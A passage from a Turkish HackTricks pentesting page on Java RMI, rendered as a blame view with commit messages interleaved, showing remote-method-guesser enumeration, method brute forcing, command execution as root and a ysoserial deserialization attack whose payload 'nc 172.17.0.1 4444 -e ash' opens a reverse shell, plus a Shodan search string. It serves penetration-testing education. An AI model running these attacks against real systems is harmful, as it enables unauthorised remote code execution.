-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								Yukarıda bahsedilen zorluklardan ikincisi _Dağıtılmış Çöp Toplayıcı_ (_DGC_) tarafından çözülür. Bu, bilinen bir `ObjID` değerine sahip başka bir _RMI servisi_ ve temelde her _RMI uç noktasında_ mevcuttur. Bir _RMI istemcisi_ bir _RMI servisini_ kullanmaya başladığında, ilgili _uzak nesnenin_ kullanımda olduğuna dair bir bilgiyi _DGC_'ye gönderir. _DGC_, referans sayısını takip edebilir ve kullanılmayan nesneleri temizleyebilir.
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								Eskimiş _Etkinleştirme Sistemi_ ile birlikte, bunlar _Java RMI_'ın üç varsayılan bileşenidir:
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+. _RMI Kayıt Defteri_ (`ObjID = 0`)
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+. _Etkinleştirme Sistemi_ (`ObjID = 1`)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+. _Dağıtılmış Çöp Toplayıcı_ (`ObjID = 2`)
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								_Java RMI_'ın varsayılan bileşenleri uzun süredir bilinen saldırı vektörleri olmuştur ve eski _Java_ sürümlerinde birden fazla zayıflık bulunmaktadır. Bir saldırgan bakış açısından, bu varsayılan bileşenler ilginçtir, çünkü bilinen sınıflar / arabirimler uygulanmıştır ve bunlarla etkileşim kurmak kolaydır. Bu durum özel _RMI servisleri_ için farklıdır. Bir _uzak nesne_ üzerinde bir yöntem çağırmak için, ilgili yöntem imzasını önceden bilmelisiniz. Var olan bir yöntem imzasını bilmeden, bir _RMI servisiyle_ iletişim kurmanın bir yolu yoktur.
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## RMI Numaralandırma
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser), otomatik olarak yaygın _RMI zayıflıklarını_ tanımlayabilen bir _Java RMI_ zayıflık tarayıcısıdır. Bir _RMI_ uç noktası tanımladığınızda, denemelisiniz:
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								```
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								$ rmg enum 172.17.0.2 9010
 								[+] RMI registry bound names:
 								[+]
 								[+] 	- plain-server2
 								[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
 								[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
 								[+] 	- legacy-service
 								[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
 								[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
 								[+] 	- plain-server
 								[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
 								[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
 								[+]
 								[+] RMI server codebase enumeration:
 								[+]
 								[+] 	- http://iinsecure.dev/well-hidden-development-folder/
 								[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
 								[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer
 								[+]
 								[+] RMI server String unmarshalling enumeration:
 								[+]
 								[+] 	- Caught ClassNotFoundException during lookup call.
 								[+] 	  --> The type java.lang.String is unmarshalled via readObject().
 								[+] 	  Configuration Status: Outdated
 								[+]
 								[+] RMI server useCodebaseOnly enumeration:
 								[+]
 								[+] 	- Caught MalformedURLException during lookup call.
 								[+] 	  --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
 								[+] 	  Configuration Status: Non Default
 								[+]
 								[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
 								[+]
 								[+] 	- Caught NotBoundException during unbind call (unbind was accepeted).
 								[+] 	  Vulnerability Status: Vulnerable
 								[+]
 								[+] RMI Security Manager enumeration:
 								[+]
 								[+] 	- Security Manager rejected access to the class loader.
 								[+] 	  --> The server does use a Security Manager.
 								[+] 	  Configuration Status: Current Default
 								[+]
 								[+] RMI server JEP290 enumeration:
 								[+]
 								[+] 	- DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
 								[+] 	  Vulnerability Status: Non Vulnerable
 								[+]
 								[+] RMI registry JEP290 bypass enmeration:
 								[+]
 								[+] 	- Caught IllegalArgumentException after sending An Trinh gadget.
 								[+] 	  Vulnerability Status: Vulnerable
 								[+]
 								[+] RMI ActivationSystem enumeration:
 								[+]
 								[+] 	- Caught IllegalArgumentException during activate call (activator is present).
 								[+] 	  --> Deserialization allowed	 - Vulnerability Status: Vulnerable
 								[+] 	  --> Client codebase enabled	 - Configuration Status: Non Default
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								Enumeration eyleminin çıktısı projenin [belgelendirme sayfalarında](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) daha detaylı olarak açıklanmaktadır. Sonuca bağlı olarak tanımlanan zafiyetleri doğrulamaya çalışmalısınız.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								_remote-method-guesser_ tarafından gösterilen `ObjID` değerleri hizmetin çalışma süresini belirlemek için kullanılabilir. Bu, diğer zafiyetleri tanımlamaya olanak tanır:
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								```
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
 								[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
 								[+]
 								[+] ObjNum: 		-4004948013687638236
 								[+] UID:
 								[+] 	Unique: 	1442798173
 								[+] 	Time: 		1640761503828 (Dec 29,2021 08:05)
 								[+] 	Count: 		-32760
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								## Uzak Metotları Kaba Kuvvet Yöntemiyle Deneme
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								Tarama sırasında herhangi bir zayıflık tespit edilmemiş olsa bile, mevcut _RMI_ hizmetleri hala tehlikeli fonksiyonları ortaya çıkarabilir. Ayrıca, _RMI_ varsayılan bileşenlerine yapılan _RMI_ iletişimi, özel _RMI_ hizmetleriyle iletişim kurulduğunda genellikle bu tür filtrelerin bulunmadığı için korunmamaktadır. Dolayısıyla, _RMI_ hizmetlerinde geçerli metod imzalarını bilmek değerlidir.
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								Ne yazık ki, _Java RMI_, _uzak nesnelerde_ metodları sıralamayı desteklemez. Bununla birlikte, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) veya [rmiscout](https://github.com/BishopFox/rmiscout) gibi araçlarla metod imzalarını kaba kuvvet yöntemiyle denemek mümkündür:
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								```
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								$ rmg guess 172.17.0.2 9010
 								[+] Reading method candidates from internal wordlist rmg.txt
 								[+] 	752 methods were successfully parsed.
 								[+] Reading method candidates from internal wordlist rmiscout.txt
 								[+] 	2550 methods were successfully parsed.
 								[+]
 								[+] Starting Method Guessing on 3281 method signature(s).
 								[+]
 								[+] 	MethodGuesser is running:
 								[+] 		--------------------------------
 								[+] 		[ plain-server2  ] HIT! Method with signature String execute(String dummy) exists!
 								[+] 		[ plain-server2  ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
 								[+] 		[ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
 								[+] 		[ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
 								[+] 		[ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
 								[+] 		[6562 / 6562] [#####################################] 100%
 								[+] 	done.
 								[+]
 								[+] Listing successfully guessed methods:
 								[+]
 								[+] 	- plain-server2 == plain-server
 								[+] 		--> String execute(String dummy)
 								[+] 		--> String system(String dummy, String[] dummy2)
 								[+] 	- legacy-service
 								[+] 		--> void logMessage(int dummy1, String dummy2)
 								[+] 		--> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
 								[+] 		--> String login(java.util.HashMap dummy1)
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Belirlenen yöntemler şu şekilde çağrılabilir:
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								[+] uid=0(root) gid=0(root) groups=0(root)
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Ya da şu şekilde deserializasyon saldırıları gerçekleştirebilirsiniz:
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								```
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
 								[+] Creating ysoserial payload... done.
 								[+]
 								[+] Attempting deserialization attack on RMI endpoint...
 								[+]
 								[+] 	Using non primitive argument type java.lang.String on position 0
 								[+] 	Specified method signature is String execute(String dummy)
 								[+]
 								[+] 	Caught ClassNotFoundException during deserialization attack.
 								[+] 	Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
 								[+] 	Deserialization attack probably worked :)
 								$ nc -vlp 4444
 								Ncat: Version 7.92 ( https://nmap.org/ncat )
 								Ncat: Listening on :::4444
 								Ncat: Listening on 0.0.0.0:4444
 								Ncat: Connection from 172.17.0.2.
 								Ncat: Connection from 172.17.0.2:45479.
 								id
 								uid=0(root) gid=0(root) groups=0(root)
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
+								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Daha fazla bilgi şu makalelerde bulunabilir:
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* [JEP 290'dan sonra Java RMI servislerine saldırı](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
 								* [Metod Tahmini](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
 								* [rmiscout](https://bishopfox.com/blog/rmiscout)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:18:23 +00:00
+								Tahmin etmenin yanı sıra, karşılaşılan bir _RMI_ servisinin arayüzünü veya hatta uygulamasını aramak için arama motorlarına veya _GitHub_ üzerinde de bakmalısınız. _Bound name_ ve uygulanan sınıfın veya arayüzün adı burada yardımcı olabilir.
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Bilinen Arayüzler
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser), sınıfları veya arayüzleri, bilinen _RMI servisleri_ veritabanında listelenmişse `known` olarak işaretler. Bu durumlarda, ilgili _RMI servisi_ hakkında daha fazla bilgi almak için `known` eylemini kullanabilirsiniz:
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								```
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								$ rmg enum 172.17.0.2 1090 | head -n 5
 								[+] RMI registry bound names:
 								[+]
 								[+] 	- jmxrmi
 								[+] 		--> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
 								[+] 		    Endpoint: localhost:41695  TLS: no  ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]
 								$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
 								[+] Name:
 								[+] 	JMX Server
 								[+]
 								[+] Class Name:
 								[+] 	- javax.management.remote.rmi.RMIServerImpl_Stub
 								[+] 	- javax.management.remote.rmi.RMIServer
 								[+]
 								[+] Description:
 								[+] 	Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
 								[+] 	This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
 								[+] 	method usually passing a HashMap that contains connection options (e.g. credentials). The return
 								[+] 	value (RMIConnection object) is another remote object that is when used to perform JMX related
 								[+] 	actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
 								[+]
 								[+] Remote Methods:
 								[+] 	- String getVersion()
 								[+] 	- javax.management.remote.rmi.RMIConnection newClient(Object params)
 								[+]
 								[+] References:
 								[+] 	- https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
 								[+] 	- https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
 								[+]
 								[+] Vulnerabilities:
 								[+]
 								[+] 	-----------------------------------
 								[+] 	Name:
 								[+] 		MLet
 								[+]
 								[+] 	Description:
 								[+] 		MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
 								[+] 		other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
 								[+] 		is therefore most of the time equivalent to remote code execution.
 								[+]
 								[+] 	References:
 								[+] 		- https://github.com/qtc-de/beanshooter
 								[+]
 								[+] 	-----------------------------------
 								[+] 	Name:
 								[+] 		Deserialization
 								[+]
 								[+] 	Description:
 								[+] 		Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
 								[+] 		method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
 								[+] 		actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
 								[+] 		establish a working JMX connection, you can also perform deserialization attacks.
 								[+]
 								[+] 	References:
 								[+] 		- https://github.com/qtc-de/beanshooter
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
+								```
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								## Shodan
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								* `port:1099 java`
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Araçlar
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
 								* [rmiscout](https://github.com/BishopFox/rmiscout)
 								* [BaRMIe](https://github.com/NickstaDB/BaRMIe)
-												GitBook: [master] one page modified
											
										
										
											2020-10-05 15:35:22 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Referanslar
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:18:23 +00:00
 								## HackTricks Otomatik Komutları
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								```
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								Protocol_Name: Java RMI                                        #Protocol Abbreviation if there is one.
 								Port_Number:  1090,1098,1099,1199,4443-4446,8999-9010,9999     #Comma separated if there is more than one.
 								Protocol_Description: Java Remote Method Invocation            #Protocol Abbreviation Spelled out
-												HAC 1099
											
										
										
											2021-08-12 12:35:15 +00:00
-Yaml
											
										
										
											2021-08-15 18:15:13 +00:00
+								Entry_1:
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Name: Enumeration
 								Description: Perform basic enumeration of an RMI service
 								Command: rmg enum {IP} {PORT}
-												HAC 1099
											
										
										
											2021-08-12 12:35:15 +00:00
+								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
-												update

											
										
										
											2023-01-01 16:19:07 +00:00
+								\
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen **iş akışlarını kolayca oluşturun ve otomatikleştirin**.\
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bugün Erişim Alın:
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												update

											
										
										
											2023-01-01 16:19:07 +00:00
+								{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								<summary><strong>Sıfırdan kahramana kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								HackTricks'ı desteklemenin diğer yolları:
-												arte

											
										
										
											2024-01-03 10:42:55 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
 								* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar gönderin.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>